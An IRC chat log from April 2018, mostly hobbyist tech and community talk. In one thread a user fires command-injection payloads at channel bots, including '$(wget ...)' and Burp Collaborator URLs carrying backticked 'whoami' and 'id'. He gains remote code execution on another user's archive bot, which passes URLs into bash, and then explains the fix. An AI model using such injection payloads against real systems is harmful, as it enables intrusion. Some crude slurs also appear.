Forum logs for 03 Apr 2018
lobbes: | finally sat down and learned some basic sed commands. I especially love the ability to chose an alternate delimiter makes certain cases of escaping characters a breeze! | [00:13] |
* lobbes | currently hacking a script to convert all the absolute references in my downloaded kibo.com to relative | [00:14] |
mircea_popescu: | yep. %%% is better than /// | [00:15] |
lobbes: | turns out the whole kibo site is only 40 mb or so, so I figured I'd try and mirror the whole thing (after browsing it last night, I realized that the meta aspects of the site are part of the fun) | [00:16] |
lobbes: | plaintext dun do it justice | [00:17] |
* trinque | suddenly regrets whatever space unescaping \/ is taking up in his skull. | [00:17] |
mircea_popescu: | lobbes here's a bonus : suppose you have a lengthy file (such as say a server log) and you want to extract just one column. you got awk : cat hurr.txt | awk '{print $3}' (and -F will set the delimiter if space's no good). | [00:17] |
mircea_popescu: | trinque i despise tools that make you escape. really, it's fucking dumb, let the metachar be settable so i can not need it. | [00:18] |
mircea_popescu: | and now consider something like cat *** | grep "data.maryland.gov" | awk '{print $19..$22}' | sort -u << "get me the fields 19th through 22nd, once only, and sorted alphabetically". | [00:19] |
mircea_popescu: | sed + awk are the excel of posix. | [00:19] |
mircea_popescu: | and as it has to be said : you are not a man until you've played a browser game through curl, pipe and awk/sed. | [00:21] |
ben_vulpes: | http://logs.bvulpes.com/trilema?d=2018-4-2#324071 << how did these numbers come out? | [00:21] |
mimisbrunnr: | Logged on 2018-04-02 16:54 mircea_popescu: we just discussed this s.nsa is at the most selling one of the two spares. ill run the numbers later an' give you an aye or nay. | [00:21] |
mircea_popescu: | still working on it. | [00:23] |
ben_vulpes: | kk | [00:24] |
mircea_popescu: | asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true | [00:27] |
mircea_popescu: | in other webamusements, https://www.themastermindwithin.com/thoughts/blog-traffic-and-income-report-march-2018/ | [01:30] |
mircea_popescu: | "In March 2018, the blog had 7,556 page views and I made $27.09!!" | [01:30] |
mircea_popescu: | and in case anyone is missing the usagi era of bitcoin, it didn't end, it just moved on : http://behindmlm.com/companies/empower-network/david-wood-claims-he-can-heal-cancer-herpes-hiv-aids-diabetes/ | [02:01] |
ben_vulpes: | !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [03:37] |
deedbot: | ben_vulpes updated rating of shinohai from 1 to -1 << ran off and took a rather useful tool with him | [03:37] |
ben_vulpes: | anyone want to buy some electronics off amazon for me, get reimbursed in btc? | [04:00] |
deedbot: | http://pizarroisp.net/index.php/2018/04/03/pizarro-statement-march-2018/ << PizzaroISP - Pizarro Statement, March 2018 | [04:06] |
shinohai: | logs.bvulpes.com/trilema?d=2018-4-3#324450 <<< have used your script, and it's former incantaion from years ago - very useful things. My solution thus far is simply running a binhost locally, which is temporary as I try to tweak recipe for amd64. | [08:28] |
mimisbrunnr: | Logged on 2018-04-03 01:03 trinque: but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done. | [08:28] |
shinohai: | Also, trinque is your www of wot not updating at this time? | [08:29] |
shinohai: | Which brings me to: | [08:29] |
shinohai: | http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. | [08:30] |
mimisbrunnr: | Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [08:30] |
shinohai: | Have a great day #trilema! | [08:30] |
shinohai: | Nos veremos despues. | [08:30] |
douchebag: | hey guys | [08:38] |
douchebag: | I think I got remote code execution on someones box | [08:38] |
douchebag: | https://i.imgur.com/pPZlvQC.png | [08:39] |
douchebag: | the IP address begins with 174.108 | [08:39] |
douchebag: | If that's one of you, please contact me and I will help you resolve this issue | [08:39] |
mod6: | mornin! | [08:50] |
mod6: | shinohai, if you could bring that thing that'd be nice. | [08:50] |
mod6: | meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily. | [08:51] |
lobbes: | I think shinohai was going to try and send me tars of jhvh1 sometime >> http://trilema.com/forum-logs-for-23-mar-2018#2414088 | [10:06] |
a111: | Logged on 2018-03-24 00:50 shinohai: I can tar the plugins up for you if you need 'em. | [10:06] |
lobbes: | either way, I'll try and slap up a vanilla gribble on my pizarro shell later this night | [10:06] |
lobbes: | how much fiat are we talkin'? If it is roughly under $500 I would be very interested >> http://btcbase.org/log/2018-04-03#1792246 | [10:10] |
a111: | Logged on 2018-04-03 08:00 ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc? | [10:10] |
* lobbes | bbl off to the saltmines | [10:10] |
ben_vulpes: | grade a smarm | [10:31] |
ben_vulpes: | lobbes: mk i'll letcha know | [10:31] |
douchebag: | Hey, would you guys be able to show me up a pizarro shell for trb? | [10:34] |
asciilifeform: | mircea_popescu: http://btcbase.org/log/2018-04-03#1792240 >>> http://p.bvulpes.com/pastes/fIWW0/?raw=true | [11:03] |
a111: | Logged on 2018-04-03 04:27 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true | [11:03] |
asciilifeform: | http://btcbase.org/log/2018-04-03#1792259 << neither mine nor anyone i know of | [11:04] |
a111: | Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108 | [11:04] |
asciilifeform: | http://btcbase.org/log/2018-04-03#1792258 << this pic is distinctly uninformative , i'd like to note | [11:04] |
a111: | Logged on 2018-04-03 12:39 douchebag: https://i.imgur.com/pPZlvQC.png | [11:04] |
douchebag: | asciilifeform: Basically last night I was sending commands in the bot that would lead to remote code execution | [11:05] |
douchebag: | The code execution being wget the url provided in case of blind RCE | [11:05] |
asciilifeform: | douchebag: ok, so carry on, put up a goatse on deedbot.org or whatever you normally do | [11:06] |
douchebag: | well it isn't deedbots IP | [11:07] |
asciilifeform: | tho the moar likely explanation is that trinque read the machine log, and, laughing, went to look at what was in yer intended payload url | [11:07] |
asciilifeform: | but i'll let him answer this one. | [11:07] |
douchebag: | Yeah I figured that was a possibility, I just figured I would mention that incase the code did get executed by anything unintentionally | [11:07] |
asciilifeform: | this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day. | [11:07] |
asciilifeform: | and uudecode payloads, deobfuscate js , whatever. | [11:08] |
asciilifeform: | ( and typically very disappointing, usually quite uninspiring, stale '1000-days' ) | [11:08] |
asciilifeform: | http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [11:10] |
a111: | Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. | [11:10] |
mimisbrunnr: | Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [11:10] |
asciilifeform: | douchebag: consider, 174.108. is a konsoomer cable isp in usa . | [11:13] |
asciilifeform: | ('time-warner' co. ) | [11:14] |
trinque: | douchebag: that is not any of my IPs | [11:18] |
trinque: | what'd you do that got it to belch? | [11:18] |
douchebag: | no clue, I just checked the logs and saw that lolz.txt was grabbed via wget | [11:24] |
trinque: | auditor: "says here you talk like a fag, and your shit's all retarded" | [11:29] |
shinohai: | http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? | [11:29] |
mimisbrunnr: | Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [11:29] |
trinque: | douchebag: I'm asking what the test was, which involved lolz.txt | [11:29] |
asciilifeform: | shinohai: ben_vulpes made the reason for his neg quite unmysterious, imho | [11:30] |
shinohai: | but i like salt, my popcorn has been a bit bland of late. | [11:31] |
shinohai: | ben_vulpes is also aware *why* checking if bot is in #trilema these days is kinda low on list of priorities, as i am in field and only read logs. | [11:32] |
shinohai: | I don't see join/parts | [11:32] |
douchebag: | trinque: I was just issuing commands to the bot | [11:33] |
douchebag: | ie: !!send $(wget http://site.com/lolz.txt) | [11:33] |
douchebag: | And I saw the file actually was requested with wget from an IP address I did not recognize | [11:34] |
trinque: | yeah I followed that part the first time | [11:34] |
douchebag: | Okay so what's the question? | [11:34] |
trinque: | after which command did you get a boop | [11:35] |
douchebag: | I have no clue - I woke up this morning and saw it in the logs | [11:35] |
douchebag: | I tried a number of different requests | [11:35] |
douchebag: | i mean commands | [11:35] |
trinque: | gpg me the full IP? | [11:36] |
shinohai: | I mean, i still can't play eulora because minigame.bz/ hasn't a server, but i certainly didn't negrate the lot of the #pizarro folks. | [11:37] |
trinque: | shinohai: weren't you running a bot? | [11:38] |
trinque: | instead of whining about it, why not bring back said bot | [11:38] |
shinohai: | yup and it shall rejoin as soon as i get back @ desk. my apologies for inconvenience | [11:38] |
shinohai: | whining indeed. | [11:39] |
trinque: | yes, whining. indeed. | [11:39] |
BingoBoingo: | <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are | [12:36] |
BingoBoingo: | roughly convenience stores. The servicios tend to have better sandwiches | [12:36] |
ben_vulpes: | !!v A4C82702BD7A91BE63B8838DB2164C2B2BC39E9F99B411FB0EEDB8D2192D1F3F | [12:39] |
deedbot: | ben_vulpes unrated shinohai. | [12:39] |
BingoBoingo: | douchebag: When are some Qntra submissions incoming? | [12:43] |
douchebag: | I can have some ready tonight if you can link me to where qntra shares are traded | [12:44] |
douchebag: | last time I tried looking there were so broken links | [12:44] |
ben_vulpes: | http://logs.bvulpes.com/trilema?d=2018-4-3#324745 << you have it backwards how i behave defines lordship and lo i got my way | [12:45] |
mimisbrunnr: | Logged on 2018-04-03 15:20 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? | [12:45] |
mimisbrunnr: | Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [12:45] |
BingoBoingo: | douchebag: On MPEx, there's proxy issues being sorted out. Sometimes the proxies run away and MP has to chain them back to his Ex | [12:54] |
BingoBoingo: | In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night. | [12:57] |
asciilifeform: | hey BingoBoingo , possibly i already asked this a while back and then lost -- but plox to gpg me a postage addr where you can get mail. i want to try experiment. | [12:58] |
ben_vulpes: | hola mircea_popescu | [13:03] |
BingoBoingo: | asciilifeform: http://p.bvulpes.com/pastes/Yvat8/?raw=true | [13:04] |
asciilifeform: | danke BingoBoingo | [13:04] |
BingoBoingo: | asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February. | [13:05] |
mircea_popescu: | heya! | [13:05] |
BingoBoingo: | Buenas Tardes | [13:06] |
asciilifeform: | and yes BingoBoingo i did think of the item you mentioned, and already prepared it, it ought to satisfy | [13:06] |
asciilifeform: | ohai mircea_popescu | [13:06] |
trinque: | douchebag: consider that if you figure out which box responded to you, you at the very least can improve some Lord's bot for him, maybe lobbes' archivebot slurped it? At best, (if it was done in PM), you've got something else listening in, slurping things up. | [13:06] |
trinque: | that latter would be a mighty interesting blog post | [13:07] |
BingoBoingo: | trinque: Remember the "Reddit Police" DDoS bot? | [13:07] |
trinque: | naw | [13:08] |
BingoBoingo: | That was 2014-ish | [13:08] |
BingoBoingo: | Roughly coincided with the GAW miners drama. | [13:08] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792252 << lol wait, is he on the list of pizarro victims, with thewhet, minigame an' so on ? or what dramas am i missing here ? | [13:09] |
a111: | Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. | [13:09] |
mimisbrunnr: | Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [13:09] |
mircea_popescu: | BingoBoingo i remember a "bitcoin police" lol ? | [13:09] |
mircea_popescu: | (they, self-importantly, didn't want to give self up to #b-a, because of course http://trilema.com/and-in-todays-lulz-the-obnoxious-cocksucker ) | [13:10] |
BingoBoingo: | mircea_popescu: Maybe that's what it was. | [13:10] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792250 << iirc they were compiled once a day. | [13:10] |
a111: | Logged on 2018-04-03 12:29 shinohai: Also, trinque is your www of wot not updating at this time? | [13:10] |
trinque: | correct, cronulated | [13:12] |
ben_vulpes: | http://logs.bvulpes.com/trilema?d=2018-4-3#324705 << do you not have a machine capable of building trb? | [13:12] |
mimisbrunnr: | Logged on 2018-04-03 14:25 douchebag: Hey, would you guys be able to show me up a pizarro shell for trb? | [13:12] |
douchebag: | My machines are capable but if I'm going to be running a node, it would probably be best to have a dedicated VPS to do so | [13:12] |
mircea_popescu: | douchebag generally it runs on actual dedicated machines, rather than vps. | [13:13] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792263 << it's all random numbers anyways. | [13:13] |
a111: | Logged on 2018-04-03 12:51 mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily. | [13:13] |
douchebag: | Ahh okay | [13:14] |
BingoBoingo: | douchebag: The added value in running more nodes is generally spreading the network geographically, etc. There's little value in adding yet another nominal node to the same box or AWS freakshow | [13:14] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792259 << did this ever come to anything then ?! | [13:14] |
a111: | Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108 | [13:14] |
mircea_popescu: | douchebag dood is building the UCI before we even have it lmao. | [13:14] |
douchebag: | UCI? | [13:15] |
mircea_popescu: | !#s UCI | [13:15] |
a111: | 189 results for "UCI", http://btcbase.org/log-search?q=UCI | [13:15] |
mircea_popescu: | "universal computing interface" | [13:15] |
douchebag: | ahh | [13:16] |
* trinque | put a rather beefy node in the pizarro rack at 161.0.121.250 | [13:16] |
trinque: | 376103 and counting | [13:16] |
douchebag: | Oh also | [13:16] |
mircea_popescu: | asciilifeform the pic shows that he got "something" to load a file from his filehost. supports the theory that has rce, if he can run wget he can run plenty. | [13:17] |
douchebag: | When I geoip'd that IP adddress | [13:17] |
mircea_popescu: | (consider, the way linux works today, if i can run wget as a user i can take the box, the memory leaks.) | [13:17] |
asciilifeform: | nobody seems to know who or what ran the wget | [13:18] |
mircea_popescu: | wget WILL time the netcard for you, the netcard has dma, that's the wholew story. | [13:18] |
mircea_popescu: | asciilifeform well, some ip apparently. i dunno, going through teh logs. | [13:18] |
asciilifeform: | asciilifeform's observation was that every idjit crapartist probing an asciilifeform-tended box , ever, without exception thought 'ooh, my wget ran' when asciilifeform reads log , and then , on specially-designated box, manually probes back & grabs payload | [13:19] |
asciilifeform: | ... but in this case, wasn't mine. and, interestingly, apparently not trinque either | [13:20] |
mircea_popescu: | this is a theory we can easily verify. douchebag write f2c26beed4 on the boxes' tits or something. can you get it reliably ? | [13:21] |
mircea_popescu: | not entirely intractable to discern whether human is involved or not. | [13:21] |
asciilifeform: | aha, supposing replicable | [13:22] |
mircea_popescu: | time will tell you everything. | [13:22] |
douchebag: | I need to get the boxes full IP | [13:22] |
douchebag: | sec | [13:22] |
douchebag: | Actually, I exited out of that - I'm able to retrieve it but I need to know the proper request to send. waiting on a response from that right now | [13:22] |
deedbot: | http://trilema.com/2018/dangerous/ << Trilema - Dangerous | [13:23] |
mircea_popescu: | the proper who ? | [13:23] |
mircea_popescu: | douchebag do you use screen, incidentally ? | [13:23] |
douchebag: | yes | [13:23] |
mircea_popescu: | a ok then. | [13:24] |
douchebag: | I did do a reverse search on that IP address though | [13:24] |
douchebag: | It seemed to be out of North Carolina if I remember correctly | [13:24] |
* lobbes | is slowly assembling parts for his own home trb node. Waiting on replacement cpu fan to come in atm. Updates to follow! | [13:24] |
douchebag: | 174.108.31.15 | [13:24] |
douchebag: | ^ Full IP | [13:25] |
* mircea_popescu | has noticed over the years that the usage of screen is a sort of pons asinorum in computer usage. like the oil rag cloth in a car distinguishes pisi tourist from the driver who actually maintains the machinery or like condoms on the nightstand distinguish the woman from the girl and so on. | [13:25] |
lobbes: | Re: douchebag's recent wget payload: I can confirm that it most likely wasn't my archivebot. The bot doesn't download links directly, it stores list of urls found in chan and forwards them to the archive.is submit form | [13:25] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792286 << i very well fucking don't. jesus christ, 1mn+ lines/day, god help me. i catgrep the item now and again, but the odds of me noticing something in there are pretty slim. | [13:26] |
a111: | Logged on 2018-04-03 15:07 asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day. | [13:26] |
asciilifeform: | y'know it's still 'read' if you put it through meatgrinder | [13:26] |
mircea_popescu: | but very distantly read. it's a perl meatgrinder, i'm sure it misses most of the meat. | [13:27] |
mircea_popescu: | douchebag looks like a home ip. \ | [13:27] |
mircea_popescu: | vulnerable home computers are pestilentially common did you get to the portion in the logs where we logged into a shitton of servers administering solar panels ? | [13:28] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792296 << oh don't be silly. i now concur with alf, this is no indication of anything yet. get it to do it systematically, in reaction to something you control, THEN you have maybe something. | [13:30] |
a111: | Logged on 2018-04-03 15:24 douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget | [13:30] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792298 << what do these two have to do with each other anyway. there should be a difference between doing wrong and not doing enough. not every burgher can be in the town council, that dun mean he's bankrupt now or something, what the hell. | [13:33] |
a111: | Logged on 2018-04-03 15:29 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? | [13:33] |
mimisbrunnr: | Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [13:33] |
douchebag: | It it okay if I test this payload again right now | [13:33] |
douchebag: | To see if I get another pingback | [13:33] |
mircea_popescu: | i don't see why not. | [13:34] |
BingoBoingo: | Best case it's just the FBI and they are too busy chasing imaginary Russians to notice you walking away with their server | [13:34] |
douchebag: | Alright, give me a moment I just didn't want to bother anyone with my payloads | [13:34] |
lobbes: | douchebag aha I think that is my home ip. Plox do test payload again | [13:40] |
douchebag: | Oh shit, and you never manually ran wget on that IP | [13:40] |
douchebag: | ???? | [13:40] |
douchebag: | or on the link??? | [13:41] |
lobbes: | Actually, when was this? I think I may hace manually wgot | [13:41] |
lobbes: | *have | [13:41] |
douchebag: | last night | [13:41] |
douchebag: | vjiayxgdlqk1veovjxso63g6ixopce.burpcollaborator.net | [13:41] |
douchebag: | on something that looked like that | [13:41] |
lobbes: | Hmm interesting. Yeah this was a few weeks ago iirc when I curiously grabbed one of yer payloads via wget | [13:42] |
douchebag: | yeah no dude | [13:42] |
douchebag: | If you didn't do this last night | [13:42] |
douchebag: | I got remote code execution on your box | [13:42] |
douchebag: | Can you send me links to the scripts ? | [13:42] |
douchebag: | I'll show you how to fix it | [13:42] |
lobbes: | Also not 100% positive if that was my home ip, but charlotte nc is my residence. I'll confirm that tonight | [13:43] |
douchebag: | So lobbes | [13:43] |
douchebag: | Are any of these things being manually passed into bash commands | [13:44] |
douchebag: | here lets see something | [13:45] |
douchebag: | http://6w3lb8toy1xc8p16w85zjethv814pt.burpcollaborator.net/`whoami` | [13:45] |
douchebag: | lobbes: How often does the bot search ? | [13:46] |
douchebag: | http://3nri25klpyo9zms3n5wwabkem5s2gr.burpcollaborator.net/$(whoami) | [13:48] |
lobbes: | the bot operates from an external vps (not my home ip). Shoves urls into a db which my home box downloads and then passes eaxh one to archive.is. | [13:50] |
douchebag: | and how are you passing these to archive.is | [13:50] |
lobbes: | That is done through a process where a python script reads from (ahhh now I think I see where it may remotely execute) db and passes url via bash to a phantomjs script which submits to archive.is | [13:52] |
douchebag: | Hahaha | [13:52] |
douchebag: | Awesome | [13:52] |
douchebag: | Well for me at least | [13:52] |
douchebag: | For you, I really do suggest fixing that | [13:52] |
lobbes: | I'll dig more into it tonight once I'm in front of it all | [13:52] |
douchebag: | Because if I was a blackhat I could have pwned ur home box | [13:53] |
lobbes: | Yeah really. Thank you for uncovering this (I am n00b, you will soon learn) | [13:53] |
douchebag: | No problem man, just glad I could help! | [13:54] |
lobbes: | Likewise, I'll give ya a favorable rating once in front of my gpg key | [13:54] |
douchebag: | Sounds like a plan | [13:54] |
trinque: | wd douchebag | [13:57] |
douchebag: | thx <3 | [13:58] |
mircea_popescu: | lobbes fwiw this is very poor design. | [14:01] |
lobbes: | Oya. Hey, this is the peril of "learning as you go" | [14:02] |
lobbes: | What would you suggest as a better design? Obvs no passing urls via bash | [14:02] |
mircea_popescu: | why is your home box doing work that's not directed at you ? | [14:03] |
mircea_popescu: | conceptually, if it's talking to you it's an infangwif if it's talking to the outside it's an outsidewif. why are you fucking streetwalkers / sending the wife to walk the streets ? | [14:03] |
mircea_popescu: | when you say "home box", what do you even mean ? | [14:04] |
douchebag: | lobbes: If you want to make a secure application, consider all user input as malicious | [14:05] |
douchebag: | lobbes | [14:05] |
douchebag: | Your home machines name is lobbes | [14:05] |
douchebag: | correct? | [14:05] |
lobbes: | mircea_popescu: the logs, but it is an old craptop with an ssd dedicated to public toilet Only place I had to store the gbs of archive data. | [14:06] |
lobbes: | douchebag si | [14:06] |
douchebag: | Yep | [14:06] |
douchebag: | https://i.imgur.com/Wwrp9VP.png | [14:06] |
douchebag: | RCE confirmed | [14:06] |
mircea_popescu: | lobbes well fine, but i was discussing teh design as such. there's no rule against "i have a crappy box for a server that's not worth placing in a dc so it sits in garage", sure. nor is there any rule against "i just simplified speech, called it homebox, it's not" -- but what you say is all i have to go on, that's all. | [14:07] |
mircea_popescu: | douchebag umm, you used his ~browser~ to do this ?! | [14:08] |
douchebag: | I think it's being passed into bash into a PhantomJS interpreter | [14:08] |
lobbes: | ^^ | [14:08] |
mircea_popescu: | oh. | [14:09] |
mircea_popescu: | nifty. | [14:09] |
lobbes: | Man I feel stupid in general | [14:09] |
mircea_popescu: | !!rated douchebag | [14:09] |
deedbot: | mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions | [14:09] |
mircea_popescu: | !!rate douchebag 2 "your home machine's name is lobbes" | [14:09] |
deedbot: | Get your OTP: http://p.bvulpes.com/pastes/Nn9Ye/?raw=true | [14:09] |
douchebag: | lobbes: Just make sure whenever you handle any user input, consider all input as potentially malicious | [14:11] |
mircea_popescu: | ben_vulpes i wasn't initially going to say anything besides "nay" but hey, pizarro's a friend of ours, so : nsa would sell the spare machine for cost, which is about .371. comes with two fgs installed and free shipping. | [14:11] |
douchebag: | and for fucks sake do not pass any user input into a bash interpreter | [14:11] |
lobbes: | douchebag really though, this has been a wake up call to get my shit together. Ty again | [14:12] |
douchebag: | Yeah no problem, it was pretty fun to discover | [14:13] |
mircea_popescu: | !!v 86FC0A4A826976505E6815A4D3677651F10E73948ED9B253C022B65F6C2DFB4E | [14:13] |
deedbot: | mircea_popescu updated rating of douchebag from 1 to 2 << "your home machine's name is lobbes" | [14:13] |
lobbes: | Just know, I'm prolly the easiest target here :P | [14:13] |
mircea_popescu: | i'm not so certain. | [14:13] |
douchebag: | http://f0gufhxx2a1lcy5f0h98nnxqzh5ht6.burpcollaborator.net/`id` | [14:14] |
mircea_popescu: | https://portswigger.net/burp/help/collaborator << that burp thing's not even retarded. runs a dummy server on the side, ns, everything. | [14:16] |
mircea_popescu: | douchebag do you know who made it ? | [14:16] |
douchebag: | It's made by a team of people | [14:17] |
douchebag: | It was originally developed by dafydd portswigger | [14:17] |
mircea_popescu: | right. | [14:17] |
douchebag: | now he has a couple other people working on it, I know ones name is James Kettle | [14:17] |
mircea_popescu: | did you spring for teh $350 a year thing ? | [14:18] |
douchebag: | Yeah, well worth it | [14:18] |
mircea_popescu: | i believe. | [14:18] |
douchebag: | mircea_popescu: I got 0.01 for perma voice, do I get 0.02 for Remote Command Execution :-D ? | [14:19] |
mircea_popescu: | lol. i was going to buy you the pro yearly package, actually. but since you already have it, no need :D | [14:20] |
douchebag: | I appreciate that, feel free to reimburse it though haha | [14:20] |
douchebag: | Man I lol | [14:22] |
lobbes: | Anyways, archivetron's url snarf has been temporarily disabled for obvious reasons. Will resume once I plug these holes tonight | [14:22] |
lobbes: | I'll announce once back up | [14:22] |
douchebag: | I bet so many bots could be pwned with similar techniques | [14:22] |
mircea_popescu: | douchebag i'll get you a sever once the pizarro folk unwrap their heads enough to actually have one on offer. so you can tinker on gentoo, trb etc and get out of the "vps" bs hell. | [14:23] |
douchebag: | A physical serve ?! | [14:23] |
douchebag: | server* | [14:23] |
asciilifeform: | hey maybe he will be the test patient for the new arm boxen. | [14:23] |
mircea_popescu: | douchebag yeah. | [14:24] |
mircea_popescu: | asciilifeform i dunno he can arm... one thing at a time. | [14:24] |
douchebag: | Holy shit thanks!! | [14:24] |
mircea_popescu: | yeah, tell you what, i'll be as happy as you are once it's finally done. | [14:25] |
asciilifeform: | mircea_popescu: if all he needs is standard unix userland, no reason he couldn't arm. | [14:25] |
mircea_popescu: | what was on those, i forget ? | [14:25] |
asciilifeform: | the arm gentoo i am cooking up as we speak. | [14:25] |
mircea_popescu: | i meant hardware | [14:26] |
douchebag: | Well, I'm gonna grab a cigarette to aid with this excitement | [14:26] |
asciilifeform: | ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) | [14:27] |
asciilifeform: | chinese thing, they publish schematic , even. | [14:27] |
mircea_popescu: | but ram hdd etc ? | [14:27] |
asciilifeform: | the unit i am testing ( will buy a few moar once i'm satisfied that it is usable ) came with 2G. there is a 4G supposedly also in production, but i was not able to obtain it | [14:28] |
asciilifeform: | hdd is a highspeed SD card , and can be of any size there is also a usb3 jack, 480MB/s and a 1G/s nic. | [14:28] |
mircea_popescu: | ah so could actually run trb np | [14:28] |
asciilifeform: | indeed it could | [14:29] |
asciilifeform: | faster, in principle, even than zoolag | [14:29] |
mircea_popescu: | this is neat. ok, chuck the largest sd you can find in there an' consider it sold. | [14:29] |
asciilifeform: | first things first, gotta terraform it. | [14:30] |
mircea_popescu: | yeah. | [14:30] |
asciilifeform: | then will simply clone the gentoo for each new user ( or he can transmit a SD image , signed , and BingoBoingo will pump it in, plug in a board, and up an' running ) | [14:30] |
mircea_popescu: | douchebag alf lands in the oriental republic sometime mid month you'll get your login then, an' your first task will be to get trb up on it and the tasks 2 throught 999 will be to have fun. | [14:31] |
mircea_popescu: | so clear your schedule 2nd half of april for it. | [14:31] |
mircea_popescu: | asciilifeform i like the model. | [14:31] |
asciilifeform: | the interesting bit is that these boxen draw ~2 - 5 watt. and are of the physical dimensions of a pack of cards. | [14:32] |
asciilifeform: | and (unlike e.g. 'raspberry') the full datashits and schems are published. | [14:32] |
asciilifeform: | chipset is a 'rockchip', i ported trb to it in 2015 iirc. | [14:32] |
asciilifeform: | (trb, buildroot-kernel, userlands) | [14:32] |
asciilifeform: | the other interesting pheature of this board is that it has no onboard flash. so nothing to sanitize aside from sdcard. | [14:33] |
asciilifeform: | ( also comes with audio and video but i do not need these and have not tried'em ) | [14:34] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792306 << ahahaha | [14:35] |
a111: | Logged on 2018-04-03 15:33 douchebag: ie: !!send $(wget http://site.com/lolz.txt) | [14:35] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792317 << well conceivably for the same reason alf isn't bringing back phuctor, neh. cuz he doesn't as of yet have where to bring it back from! | [14:36] |
a111: | Logged on 2018-04-03 15:38 trinque: instead of whining about it, why not bring back said bot | [14:36] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works. | [14:37] |
a111: | Logged on 2018-04-03 16:36 BingoBoingo: <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are | [14:37] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792327 << yeah, bringing mpex proxies back up is underway. | [14:38] |
a111: | Logged on 2018-04-03 16:44 douchebag: last time I tried looking there were so broken links | [14:38] |
trinque: | general point of "nobody wants your head bud, just move in a direction". I guess he had a health problem, which is rough. | [14:38] |
lobbes: | To wrap back to this discussion, I think I see your point. There's no real reason this craptop needs to deal with the user input at all. All I need it for is to download, store and parse shit download from archive.is. >> http://btcbase.org/log/2018-04-03#17924 | [14:38] |
a111: | Logged on 2013-05-06 02:54 tiberiusiv: miami is not like NYC lol | [14:38] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope. | [14:38] |
a111: | Logged on 2018-04-03 16:57 BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night. | [14:38] |
asciilifeform: | mircea_popescu: s/meet/meat/g in footnote ii in yer latest article | [14:39] |
mircea_popescu: | lobbes the only important consideration here is that design is not a haphazard activity driven by occurence and circumstance. that's implementation. design is a deductive activity, it proceeds from first principles and does not break faith. | [14:39] |
lobbes: | Wat a111 misquote? | [14:39] |
